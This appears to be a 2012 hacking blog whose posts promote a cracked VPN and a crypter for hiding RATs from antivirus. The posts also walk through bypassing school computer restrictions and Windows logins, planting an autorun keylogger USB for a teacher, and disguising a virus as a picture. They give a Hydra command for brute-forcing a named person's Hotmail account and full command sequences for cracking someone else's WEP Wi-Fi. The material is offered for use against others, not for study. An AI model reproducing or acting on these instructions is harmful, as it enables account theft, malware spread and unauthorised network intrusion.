Search This Blog

Monday, July 30, 2012

Best Free VPN Full Cracked Version

Posted Image


Hi all users, here is the solution for your question for free VPN, so without loosing a single movement lets get started.

Advantages of  UltraVPN
  • Absolutely Free
  • No Annoying Ads
  • No Bandwidth Limits
  • No Congestions
  • No Frequent Disconnections
  • Strategically Located Servers
  • Dedicated Torrent Servers
  • Daily Server Updates

How to get access in UltraVpn Pro:

1. Simply Download it from Here (this is the Full Ver.)


>ALL SERVERS ARE UP
  • 5 US servers
  • 2 HK servers
  • 1 MIA and
  • 1 LA server
Enjoy & Stay : Posted Image
Discovered this like a month a go and its AWESOME ! I just cant '' internet '' without it ! :) 

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Sunday, July 8, 2012

2012 Crypter


[Image: iHp2GmBRNs9RE.png]

[Image: P1.png]
[Image: P2.png]
[Image: P3.png]


Features:
    [+]Limited Copies To Sell
      [+]Less Users of Crypter So less Detection 
    [+]Coded in C#
      [+]Works on all OS with 2.0 framework (By default in Xp sp3, Vista, 7) 
    [+]Working on : XP/VISTA/7 [32/64 BIT]
      [+]Unicode Os Support
    [+]Private Encrypted Fud RunPE
      [+]RunPE #1 (Special RunPE Coded In VB)
      [+]RunPE #2 (Special RunPE Coded In C#)
    [+]Custom Injection
      [+]Drop & Run
      [+]vbc.exe
      [+]csrss.exe
      [+]svchost.exe
      [+]winlogon.exe
      [+]Default Browser

    [+]9 Different Encryptions
      [+]Polymorphic Encryption
    [+]File Binder
      [+]Binds Any File (.jpg, .mp3, .pdf, .wmv etc.)
      [+]One time execution Binder added
    [+]Compressed OutPut
      [+]40% Small Output then the server size
    [+]Custom encryption Pool
      [+]Creates an Unicode Pass for encryption
    [+]25+ Antis
      [+]Kills most Of all
    [+]2 Start-Up Methods
      [+]HKCU
      [+]Add to Start-up Folder
    [+]Custom Start-up Name
      [+]Use your desired Start-up name
    [+]Custom Install Path
      [+]Temp
      [+]Appdata
      [+]My Documents
    [+]Hide File
      [+]Hides the file After It runs
    [+]4 Worm Functions
      [+]USB Spreader
      [+]RAR Spreader
      [+]Zip Spreader
      [+]Lan Spreader
    [+]4 Disablers
      [+]Task Manager
      [+]System Restore
      [+]CMD
      [+]System Registry
    [+]NT Header
      [+]Protects output from reflection 
    [+]File Persistence
      [+]Protects your file from Getting Deleted 
    [+]Melt File
      [+]Deletes itself at the end, When ran
    [+]Bypass Firewall
      [+]Bypass into network security of firewall
    [+]Bypass UAC
      [+]Bypass any UAC level in Vista & 7
    [+]Assembly Changer
      [+]Set desired assembly in the output file 
    [+]File Cloner
      [+]Clone Assembly of any executable
    [+]Icon Changer
      [+]Get your desired icon in the output file 
    [+]Extension Spoofer
      [+]Set any extension to the output (.jpg, .pdf, .txt, .mp3, .wmv)
    [+]Auto-Update
      [+]Automatically Updates when any Update is available.
      [+]Updated almost twice a week
    [+]Dynamic HWID
      [+]Changes your HWID on your need 
    [+]Botkiller (Added Soon)
      [+]Kills all Rats & keyloggers from PC 

100% Tested and Works With:
    [√] BlackShades RAT
    [√] BlackShades HTTP
    [√] Blackshades Stealer
    [√] Blackshades Fusion
    [√] CyberGate
    [√] DarkComet 5
    [√] SpyNet
    [√] XtremeRAT
    [√] iStealer
    [√] DDoSeR
    [√] Albertino's Advanced RAT
    [√] Poison Ivy
    [√] Cerberus
    [√] xDoseR
    [√] Turkojan 4 Gold
    [√] Dark DDoser
    [√] Cammy
    [√] POE Stealer
Download 2012 Crypter with 2 Stubs : http://uppit.com/n69kgxm5phtz/2012.rar



Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How To Access C Drive When It's Blocked


Introduction

Today, I am going to release my tutorial. A lot of schools have blocked C DRIVE from hacking attempts to the school systems/machines. There are many ways to access the drive. Including CMD, Firefox/Google Chrome etc. Please follow all your local laws. Read their Legal. And do not I REPEAT DO NOT DELETE ANY SYSTEM FILES FROM ANY EDUCATIONAL COMPUTERS, IT WILL END BADLY!

Ok that is all over and done with, now for the tutorial.

Firefox/Google Chrome

Open Firefox or Google Chrome and type the following in the URL;

Quote:C:\

This will not allow you to open the files, but download them. In other words, you need the whole folder to work a .exe file (Unless it is a self ran .EXE or a text file)

This method is useful for trying to search a file and open the file with CMD.

Command Prompt


Windows 7 (THANKS TO W0lfbane): Read the above tutorial but instead of "command.com" put in the following;

Quote:@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1

To browse through the C Drive, type in the following;

Quote:C:

And if you want to open a file, type in the following for the example;

Quote:start C:\Windows\cmd.exe

Bypassing Administrator Password (Kon-Boot)


Bypassing Administrator Password: Only Windows XP

You will need a LAN cored for this Bypass. If your school/work is connected to wireless. You can not do this.

What a LAN Cored looks like

[Image: CALAN-BL-XX_Lan_cable_01.jpg]

When you are connected to a network. You can access full Administrator rights by doing the following steps;

1. Reboot system.

2. Find where the LAN/Local cored is located.

3. Login, when it says "Applying User Settings" take out the LAN cored as quickly as you can.

4. Wait till it logs in, when you are on your desktop. Put the LAN cored back in to access the Internet.

Keylogging And Social Engineering

It often requires no techy knowledge to instigate, but the more you have, the better. For example, leave a USB stick beside the teacher's computer in the computer-room/library/classroom, with an Autorun keylogger. Tell the teacher that the USB is yours. S/He should plug it into their PC and prove it is yours.

Linux Bootable USB

(Thanks To KlokWeiss)

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

2. Format the USB drive to FAT32

3. Download Unetbootin from http://unetbootin.sourceforge.net/

4. Start Unetbootin and select diskimage (use the backtrack-final ISO)

5. Change the boot startup to USB via BIOS.

6. Log into BackTrack with the default username and password root / toor.

End

There are countless ways to access the School/Work Place System to gain control to the C:\ Drive. Hope you learned a lot reading this thread.

Please do not leach this thread without my permission. It's just a PM away.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How To Access C Drive When It's Blocked


Introduction

Today, I am going to release my tutorial. A lot of schools have blocked C DRIVE from hacking attempts to the school systems/machines. There are many ways to access the drive. Including CMD, Firefox/Google Chrome etc. Please follow all your local laws. Read their Legal. And do not I REPEAT DO NOT DELETE ANY SYSTEM FILES FROM ANY EDUCATIONAL COMPUTERS, IT WILL END BADLY!

Ok that is all over and done with, now for the tutorial.

Firefox/Google Chrome

Open Firefox or Google Chrome and type the following in the URL;

Quote:C:\

This will not allow you to open the files, but download them. In other words, you need the whole folder to work a .exe file (Unless it is a self ran .EXE or a text file)

This method is useful for trying to search a file and open the file with CMD.

Command Prompt


Windows 7 (THANKS TO W0lfbane): Read the above tutorial but instead of "command.com" put in the following;

Quote:@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1

To browse through the C Drive, type in the following;

Quote:C:

And if you want to open a file, type in the following for the example;

Quote:start C:\Windows\cmd.exe

Bypassing Administrator Password (Kon-Boot)


Bypassing Administrator Password: Only Windows XP

You will need a LAN cored for this Bypass. If your school/work is connected to wireless. You can not do this.

What a LAN Cored looks like

[Image: CALAN-BL-XX_Lan_cable_01.jpg]

When you are connected to a network. You can access full Administrator rights by doing the following steps;

1. Reboot system.

2. Find where the LAN/Local cored is located.

3. Login, when it says "Applying User Settings" take out the LAN cored as quickly as you can.

4. Wait till it logs in, when you are on your desktop. Put the LAN cored back in to access the Internet.

Keylogging And Social Engineering

It often requires no techy knowledge to instigate, but the more you have, the better. For example, leave a USB stick beside the teacher's computer in the computer-room/library/classroom, with an Autorun keylogger. Tell the teacher that the USB is yours. S/He should plug it into their PC and prove it is yours.

Linux Bootable USB

(Thanks To KlokWeiss)

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

2. Format the USB drive to FAT32

3. Download Unetbootin from http://unetbootin.sourceforge.net/

4. Start Unetbootin and select diskimage (use the backtrack-final ISO)

5. Change the boot startup to USB via BIOS.

6. Log into BackTrack with the default username and password root / toor.

End

There are countless ways to access the School/Work Place System to gain control to the C:\ Drive. Hope you learned a lot reading this thread.

Please do not leach this thread without my permission. It's just a PM away.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How To Bypass Windows And Linux Admin Login


Kon-Boot Tutorial

Today I am going to tell you how to bypass the Windows and Linux admins' account without a password cracker.

How Does It Work?

A program called Kon-Boot modifies your BIOS only temporarily so it lets Kon-Boot bypass the password authentication.

What You Need


Windows or Linux Installed
Kon-Boot
Spare CD or USB
A Computer With BIOS Installed

How To Install

First you will need to download the file here http://www.multiupload.com/UMFD8T2MFO

The old link didn't seem to work anymore, I give credit to mepsnet for the multiupload link

When you have finished downloading, extract the .Zip file on your desktop.

Download a .Iso burner such as ISO Recorder Power Toy http://www.petri.co.il/how_to_write_iso_files_to_cd.htm

Burn the .Iso to a disc then reboot your computer.

Go to your BIOS and change the boot to CD. Then put CD in the computer and save and exit.

How To Bypass Login

The computer should start up the CD. It should say that BIOS is ok and then start Windows/Linux as normal.

The computer should now go to the log in page (Unless you are the only user on the computer, it will log in automatically) Click any user with a password and should log in without a password.

End

I recommend not to do this on a old computer because it might harm the BIOS chip.

Thank you for reading my tutorial.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Brute Force on Porn Sites

This summary is not available. Please click here to view the post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Hide any file inside a picture!



Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to:http://www.mediafire.com/?igjy4dnn0zb < This will be caught by your AV as "Binder/Kit". It is not a virus, it is a binder than is not undectable. If you don't wish to use it, that's fine, find your own.

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial

[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

(100% WORKS)Unblock websites on your schools computer!(100% WORKS)

1)Open "My computer" and go to
c:\windows\system32\drivers\etc

2)Open hosts file with notepad.

3) erase any websites written there and save!

Way 2:

1) Open the cmd and ping your website: Open cmd and write ping yoursite.com 

If cmd is blocked open notepad and write: start command.com
and save it as cmd.bat (don't forget the .bat)
Run it and a cmd will open.

2) it will say its ip with many other things

3) Open your browser and instead of writing the site address write its IP!

Way 3:

1) Go to google.com
2)Go to the translate section
3)write your website and on the other site if you press your site it translates it to the language you had and it's not blocked anymore!

Way 4:

1) Go to http://l33ts.site11.com (My site) 

2) Accept what it sais and it will open Paradox OS.
3) down left it sais proxy. Press the icon
4)Write your site and press go!
5) This OS is made for Google Chrome so I prefer to use that browser if you can.
(My website is Temporary down. You can use http://www.anonasurf.com until it gets fixed.)

Way 5: 

1)Download a different browser. If you can't download it and install it on your pc and copy the files to your USB.

2) The website are no longer blocked!

Way 6: This is a bit like way 3. We are using google. 

1)Go to google.com and write the site you want to access. 

2)When you find it press "cached". The website will load!

If both 6 ways don't work then uninstall everything in the computer and try again!!!! LOL

Thanks for viewing this thread and good luck!

This works on EVERY School. I know that because my school has some of the best securities and only way 4 worked. So it must work for you too.

Please post here and tell if you liked it and if it worked!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Bruteforce your enemy and recover the password



So, I guess you want to crack hotmail accounts? Well I'm here to show you.
Fed up of downloading bruteforcing applications? Ones that don't work? Or you're scared they may be backdoored?

Let's use a tool that is legitimate for breaking the security on logins.
This tool is called Hydra.

You can download it from..
http://www.thc.org/thc-hydra/

Because I use GNU/Linux, this tutorial will be based on Ubuntu 12.04.
Don't worry if you use Windows, the commands are pretty much the same.

Open a terminal and type...
Code:
sudo apt-get install hydra

If you prefer a GTK/GUI version.
Code:
sudo apt-get install hydra-gtk

Only the command line/terminal version is covered in this tutorial.
I want you to use less of GUI's, we are using Linux after all :)

Let's go!
So.. if you type..
Code:
hydra

You'll get a list of options to choose from,
We want to attack the SMTP - which is the mail server, for hotmail.
Because Hotmail runs on SSL connections, we need to specify the SSL port when attacking.

The full command looks like this..

Make sure you FIRST change to the wordlist directory, if you saved the 14 million pass to the Desktop..

Code:
cd ~/Desktop

Code:
hydra -V -S -l Emailaddress@hotmail.com -P "14 million pass.txt" -e ns -o "Cracked!" -t 8 pop3.live.com pop3 -s 995

These options mean...
Quote:hydra - We use the application name.

-V - This shows the output of passwords it checks, you can also add -Vv for extra verbosity [errors, warnings etc - Not really recommended, as it just floods the window]

-S - Use an SSL connection [Needed!]

-P The dictionary list we will use to attack the given Hotmail address [ I will post a link to a 14 million wordlist, perfect for cracking!]

-e ns - try "n" null password, "s" login as pass

-o "Cracked" - Once the password has been cracked, it will store it in a nice file called "Cracked" [Note your directory!]

-t 8 - The number of tasks to use, 8 is fine, any more could cause too many passwords checking and overload the times it gets to check each individual password.

Server - Service - pop3.live.com pop3 - We want to use Hotmail's pop3 server with the service pop3!

-s 995 - This is the SSL port [Needed!]

Upon hitting enter, it should start cracking!
If you get errors, like timeout errors, re-check your terminal command, an error isn't because the bruteforce doesn't work, it just means there is something wrong with the command (Unless Hotmail put a security lock on!)

Here is a picture of me Cracking!
[Image: f4xQa.jpg]

Here is the 14 million wordlist.
Code:
http://www.mediafire.com/?1whma3u7aev3985

If you want to resume the attack at a later day, use the command..
Code:
hydra -R

Not using this command will overwrite the recovery file and start from the beginning.

Hope you guys like.
Please, if you share this, give me credits :)

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, July 7, 2012

Crack WEP on Windows without linux, supports intel 5100/5300 NOOB friendly

This is what you need:
1. Commview 6.2(it supports intel 5100 & 5300) 
http://www.tamos.com/files/ca6.zip
- this is a direct download, i copied the url from IDM.

2. Aircrack for windows:
http://www.aircrack-ng.org/ (click windows)
PICTURE:http://i41.[censored].com/29c1d6p.jpg

http://www.dll-files.com/dllindex/dll-fi...ml?cygwin1 (click download)
PICTURE:http://i40.[censored].com/vq6249.jpg


http://www.tuto-fr.com/tutoriaux/crack-w...p/Peek.zip
(downloads the same as commview6.2)

INSTALLATION:
1.Install commview 6.2, install like any other regular program.
2. extract aircrack zip file to root, which is "C" for most computers
3.now extract peek zip file to the bin folder which is in aircrack like this C:\aircrack folder\bin.
4. and extract dll file to bin folder also.

You will be overwriting some files, just click yes to overwrite them.
I recommend making a shortcut for aircrack GUI.exe, because your going to use it alot.
Now go take a 5 minute break. 

OK back from break? Now get ready

Real WEP capturing steps:
1. open commview 6.2 and click the M and the C to shade them and then click play.(The D should be unshaded )

2.Now click start scan, choose band "i use the b/g/n" and then click capture don't worry.

3.Now wait about 2 minutes and right click and copy mac address of the wep network with the most packets or best signal.


4. Enable MAC address rules, action: capture, add record: both, paste mac address, then click add mac address(look like pic except the mac address, will be different)


5. Final steps in configuration
Click logging tab, make sure auto saving is checked, and increase size to 150 or higher, this can be adjusted later and leave logs directory as is.(I did 1,000,000 mb = 1GB, because of capturing 13 networks at a time).

NOW WAIT until you get about 1million through 2 million packets, or just record overnight for atleast 2 night. Then continue.

AS you can see I have collected keys for about 1 week on and off, becuase of torrent download

PART 2

1.click logging tab and save all packets in buffer, then click concatenate Logs. and select all logs and save in folder.(I saved in a new folder called binded and you can see theere from different days)

2. Open log viewer, by pressing ctlr+L or going to file in top right corner.

3.Load commview logs, should look like this pics when loaded.(I have 189518 keys, out of almost 2 millon packets )

4. now go to file and click export logs and to the bottom of drop box click wireshark/tcp dump format. now give this file a name, something easy to remember. 

5. Your done with commview, but i recommend to leave open to get more packets just in case.

PART 3
1. Open aircrack GUI.exe
2. now click choose, and go find the .cap file you saved.


3.click launch and click the one you want, i wanted the first one so i choose 1 and press enter.(this step is only for people with multiple networks)

4. now wait and you should get this.
PICTURE:http://i40.[censored].com/1z1uvkz.jpg

5. now right click and select all and press enter and save to notepad. or connect and enter key without colon in wep password box.

That's it .
The other 25% that I got it from was from here:
5% - http://wirelessdefence.org/Contents/Airc...nstall.htm
10% - other multiple sources.

I got this working, because of stress.

EDUCATION PURPOSES ONLY. I"LL ADD MAC CHANGER WHEN I FIND A GOOD ONE.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Guide to WEP Hacking WI-FI

This guide is aimed to help you crack WEP Passwords.. As said, this is a Total n00b Guide to Wireless Hacking.. 

The Stuff that you are going to need is 
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection

Before we Start, I take it for Granted that you are aware of a Few things...

I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.

Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)

Now that we are Ready.. Lets Begin..

If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.

[Image: backtrackstartup.png]

Just Select "Start BackTrack FrameBuffer (1024x768)
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.

What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".

Once, the Startup is Completed you will be at the Desktop of Backtrack

Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
[Image: backtrackstartnetwork.png]

Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.

Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.

In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.

Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0

Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
[Image: airmon1.png]

Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0

What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second

You Might just wanna copy the BSSID as it is going to be used a lot.

Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}


[Image: airodump1.png]

Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.

Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0

Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)

[Image: airodump3.png]

Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay

Its your Lucky day..lol.. I will be going through both. 

But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this when the Attack is Successful. 

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.

[Image: aireplay3.png]

OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.

It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.

[Image: aireplay6.png]

Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it. 

Just hit ENTER and there we go, the Packet has been made.

[Image: aireplay8.png]

Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0

Just hit ENTER and the Mag!c Finally begins...

Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...

[Image: aireplay12.png]

Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs

Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....

And Voila... Here it is....

[Image: aireplay15.png]

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo